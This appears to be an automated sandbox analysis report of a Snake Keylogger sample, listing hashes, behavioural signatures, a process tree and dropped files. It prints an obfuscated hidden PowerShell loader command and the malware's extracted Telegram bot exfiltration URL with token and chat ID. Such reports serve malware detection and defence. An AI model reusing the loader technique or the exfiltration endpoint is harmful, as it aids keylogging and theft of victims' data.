Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 02:39
Static task
static1
Behavioral task
behavioral1
Sample
738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Evighedskalenders.url
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Evighedskalenders.url
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Trttes.ps1
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Trttes.ps1
Resource
win10v2004-20241007-en
General
-
Target
738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe
-
Size
663KB
-
MD5
fa43b6f6caf5540ba0f6d0086388a3aa
-
SHA1
a093a22d20628af8c60ccb7788d1dacb13256e0f
-
SHA256
738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450
-
SHA512
2f942fb33e8030e9de59dc5bd8d28747ef3b5d6a2b40165e8e6e983f234554d2eb7b5bf3e8b0e87c8c15aa8ae6e528a5578fe6c785848b7e164aafd53d83124e
-
SSDEEP
12288:G0mnA1ztovdMjb6RIA7ENUGyOwFxDVin19zIor9t3DSDb4Np:uA1ztovKQM6Gy5mnDz33ew/
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7610532139:AAFiI3HHwFD6pWziyPu3lWJbRKPQtz0nD2c/sendMessage?chat_id=6680692809
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/4992-66-0x0000000000600000-0x0000000001854000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3708 powershell.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 4992 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4992 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3708 powershell.exe 4992 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\propangas.lem 738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 212 4992 WerFault.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3708 powershell.exe Token: SeIncreaseQuotaPrivilege 3708 powershell.exe Token: SeSecurityPrivilege 3708 powershell.exe Token: SeTakeOwnershipPrivilege 3708 powershell.exe Token: SeLoadDriverPrivilege 3708 powershell.exe Token: SeSystemProfilePrivilege 3708 powershell.exe Token: SeSystemtimePrivilege 3708 powershell.exe Token: SeProfSingleProcessPrivilege 3708 powershell.exe Token: SeIncBasePriorityPrivilege 3708 powershell.exe Token: SeCreatePagefilePrivilege 3708 powershell.exe Token: SeBackupPrivilege 3708 powershell.exe Token: SeRestorePrivilege 3708 powershell.exe Token: SeShutdownPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeSystemEnvironmentPrivilege 3708 powershell.exe Token: SeRemoteShutdownPrivilege 3708 powershell.exe Token: SeUndockPrivilege 3708 powershell.exe Token: SeManageVolumePrivilege 3708 powershell.exe Token: 33 3708 powershell.exe Token: 34 3708 powershell.exe Token: 35 3708 powershell.exe Token: 36 3708 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4464 wrote to memory of 3708 4464 738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe 83 PID 4464 wrote to memory of 3708 4464 738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe 83 PID 4464 wrote to memory of 3708 4464 738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe 83 PID 3708 wrote to memory of 4992 3708 powershell.exe 97 PID 3708 wrote to memory of 4992 3708 powershell.exe 97 PID 3708 wrote to memory of 4992 3708 powershell.exe 97 PID 3708 wrote to memory of 4992 3708 powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe"C:\Users\Admin\AppData\Local\Temp\738532ed75db18650d507e33de23fc624a91ce76fff5a704310be17635f45450.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Stavelsesantallenes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Trttes.Lsg30';$Rensemaskinens=$Stavelsesantallenes.SubString(50893,3);.$Rensemaskinens($Stavelsesantallenes)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 15204⤵
- Program crash
PID:212
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4992 -ip 49921⤵PID:428
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
297KB
MD55486b2628ef878dcf6c0ff20fb44e1b2
SHA1348bd502c7c5d043b96b56d12031422dabdbfc4c
SHA256988aec254517a9ed62e9aee0ef9d5d3888600d915eea4e89ae803e298c6e3071
SHA512bb450c02386e09fd27b7f91a8d72f387f05232819caf815caf433fb1efc5b2c6c5455ff6fe1e6e050aa14483cef5bcc9736a74bcdc13d43110a7131908a9b1f8
-
Filesize
49KB
MD57e324ee649b79b8d21cc35127546dc6f
SHA1852fdc7255cff49666a79a8f1b196340679360bb
SHA256ff5d64b1291d7f4d4f9274beb4a0f9bb49870cd80134a8b5392913154449b1fb
SHA512df3d449df9c2e7a5258256ee5dfec849e3d5a4953674e203217e59fc2ad12fd2b44443031b1749f73e1d7051536e1db7a87bcc82a0c2cd151d17ce05422089f1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82